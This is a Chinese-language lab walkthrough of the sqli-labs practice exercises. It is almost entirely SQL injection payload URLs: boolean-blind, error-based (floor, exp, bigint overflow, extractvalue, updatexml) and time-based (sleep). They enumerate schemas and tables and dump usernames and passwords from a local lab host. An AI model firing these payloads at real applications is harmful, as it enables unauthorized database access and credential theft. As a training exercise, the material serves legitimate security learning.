URL:猜测第一个字符是否大于'i'字符 http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),1)>'i'--+
1 2
URL:确定第一个字符是s http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),1)='s'--+
1.1.1.2.猜解第二个字符
1 2
URL:必须添加第一个字符,以便进行猜解第二个字符; http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),2)='se'--+
1 2
URL:没有第九个字符,会直接报错,如下面URL. http://sqli-labs.me:8888/Less-6/?id=1" and left(database(),9)>'securitya'--+
1.1.2.爆库
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select schema_name from information_schema.schemata limit 0,1),1)='i'--+
1 2 3
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select schema_name from information_schema.schemata limit 0,1),12)='information_'--+
1.1.2.1.第一张表
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='e'--+
1 2 3
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema='security' limit 0,1),3)=‘ema’--+
1.1.2.2.第二张表
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema='security' limit 1,1),1)='r'--+
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select table_name from information_schema.tables where table_schema='security' limit 1,1),2)='re'--+
其他测试可自行继续猜解其他表,其中包含:users等表,具体不作实操;
1.1.3.爆表
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i'--+
1 2 3
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select column_name from information_schema.columns where table_name='users' limit 0,1),2)='id'--+
其他字段名:id、username、password
1.1.4.爆数据
1 2
URL:注意:第一个username是D,大写字符,但是这里无法区分大小写; http://sqli-labs.me:8888/Less-6/?id=1" and left((select username from security.users limit 0,1),1)='d'--+
1 2
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" and left((select username from security.users limit 0,1),2)='du'--+
URL: http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select database()),1,1))=115 --+
1 2
其他URL:101—>'e' http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select database()),2,1))=101 --+
注意:超出字符长度时,设置最小ascii字符,也会报错,说明字符已经猜解完毕
1 2
URL: http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select database()),9,1))>65 --+
1.2.2.爆表
1 2 3
URL:101—>'e' http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+
1 2 3
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109 --+
和上面一样修改部分数字即可;表名:users、emails等:
1.2.3.爆字段
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105 --+
1 2 3
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))=100 --+
格式: ord(string) 对获取的字符进行ascii码转换; mid((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1) 截取字段中第一行的第一个字符; mid(column_name,start[,length])
1.3.1.爆库
1 2
URL:第一个字符的ASCII码 http://sqli-labs.me:8888/Less-6/?id=1" and ord(mid((select database()),1,1))=115--+
1 2
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" and ord(mid((select database()),2,1))=101--+
格式:regexp '^…' regexp ‘^…' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1) --+
1.4.1.爆库
1 2
URL: http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 and database() regexp '^[a-z]' limit 0,1) --+
1 2
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 and database() regexp '^[s-s]' limit 0,1) --+
1.4.2.爆表
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^[a-s]' limit 0,1) --+
1 2 3
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^[e-e]' limit 0,1) --+
1.4.3.爆字段
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^[a-z]' limit 0,1) --+
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select user()),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
2.1.1.爆库
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select schema_name from information_schema.schemata limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
1 2 3
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select schema_name from information_schema.schemata limit 6,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
2.1.2.爆表
1 2 3 4
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
1 2 3 4
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
2.1.3.爆字段
1 2 3 4
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
1 2 3 4
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
2.1.4.爆数据
1 2 3
URL:这里payload只能爆出一列字段信息 http://sqli-labs.me:8888/Less-6/?id=1" union select 1,scount(*),concat(0x3a,(select username from security.users limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
1 2 3
其他URL: http://sqli-labs.me:8888/Less-6/?id=1" union select 1,count(*),concat(0x3a,(select password from security.users limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.columns group by a --+
http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT USER())a))),2,3--+
如果列数量不对时会报错;
1 2
URL: http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT USER())a))),3--+
2.2.1.爆库
1 2 3
第一个数据库: http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from information_schema.schemata limit 0,1)a))),2,3--+
1 2 3
第二个数据库: http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT schema_name from information_schema.schemata limit 1,1)a))),2,3--+
2.2.2.爆表
1 2 3
第一张表: http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT table_name from information_schema.tables where table_schema='security' limit 0,1)a))),2,3--+
1 2 3
第三张表: http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT table_name from information_schema.tables where table_schema='security' limit 2,1)a))),2,3--+
2.2.3.爆字段
1 2 3
第一个字段名: http://sqli-labs.me:8888/Less-5/?id=1' union select (exp(~(select * FROM(SELECT column_name from information_schema.columns where table_name='users' limit 0,1)a))),2,3--+
2.2.4.爆数据
1 2 3
第一列数据:注意:这里只是爆出username列; http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT username from security.users limit 0,1)a))),2,3 --+
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT username from security.users limit 1,1)a))),2,3 --+
2.2.5.爆两列数据
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT distinct concat(0x3a,username,0x3a,password) from security.users limit 0,1)a))),2,3 --+
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (exp(~(select * FROM(SELECT distinct concat(0x3a,username,0x3a,password) from security.users limit 1,1)a))),2,3 --+
2.3.bigint溢出
具体产生原理可以阅读《mysql注入之bigint溢出报错注入》其中已经介绍完备;
2.3.1.爆库
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select schema_name from information_schema.schemata limit 0,1)x) - ~0),2,3--+
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select schema_name from information_schema.schemata limit 6,1)x) - ~0),2,3--+
2.3.2.爆表
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select table_name from information_schema.tables where table_schema='security' limit 0,1)x) - ~0),2,3--+
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select table_name from information_schema.tables where table_schema='security' limit 1,1)x) - ~0),2,3--+
2.3.3.爆字段
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select column_name from information_schema.columns where table_name='users' limit 0,1)x) - ~0),2,3--+
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select column_name from information_schema.columns where table_name='users' limit 1,1)x) - ~0),2,3--+
2.3.4.爆数据
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select username from security.users limit 0,1)x) - ~0),2,3--+
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" union select (!(select * from (select username from security.users limit 1,1)x) - ~0),2,3--+
URL: http://sqli-labs.me:8888/Less-6/?id=1” and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
1 2
URL: http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select user()),0x7e))--+
2.4.1.2.爆表
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e))--+
2.4.1.3.爆字段
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e))--+
2.4.1.6.爆数据
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e))--+
2.4.2.Xpath注入之updatexml()
2.4.2.1.爆库
1 2
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
1 2
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
2.4.2.3.爆表
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)--+
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1),0x7e),1)--+
2.4.2.4.爆字段
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1)--+
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e),1)--+
2.4.2.5.爆数据
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),1)--+
1 2 3
URL: http://sqli-labs.me:8888/Less-6/?id=1" and updatexml(1,concat(0x7e,(select username from security.users limit 1,1),0x7e),1)--+
http://sqli-labs.me:8888/Less-10/?id=1" and sleep(5)--+
3.1.3.爆库
1 2
URL:115—>s http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid(database(),1,1))=115,sleep(5),1)--+
3.1.5.爆表
1 2 3
URL:101—>e http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,sleep(5),1)--+
3.1.6.爆字段
1 2 3
URL:105—>i http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,sleep(5),1)--+
3.1.7.爆数据
1 2 3
URl:68—>D http://sqli-labs.me:8888/Less-10/?id=1" and if(ord(mid((select username from security.users limit 0,1),1,1))=68,sleep(5),1)--+